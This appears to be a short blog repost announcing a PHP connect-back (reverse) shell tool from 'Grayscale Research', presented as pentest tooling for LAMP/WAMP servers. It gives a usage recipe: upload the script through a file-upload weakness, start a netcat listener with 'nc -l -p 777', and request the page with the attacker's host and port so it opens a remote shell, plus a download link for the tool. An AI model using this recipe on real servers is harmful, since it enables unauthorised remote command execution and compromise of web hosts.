| Grayscale PHP Connect Back Shell Utility 1.1 |
| Source: | Grayscale Research |
This tool is useful specificially for penetration tests which include LAMP/WAMP servers. Upload this script to a remote host with file upload, locate script, and set up an accessable listening socket.
Set Up Listener (any port can be used):
nc -l -p 777
Then invoke the page as follows:
http://website/php_connectback.php?host=connectbackipaddress&port=777
This will use the php engine to connect back to the host and allow for a shell to be spawned remotely using just PHP.
http://www.grayscale-research.org/new/code/GS-PHPConnectBack.tar
Nenhum comentário:
Postar um comentário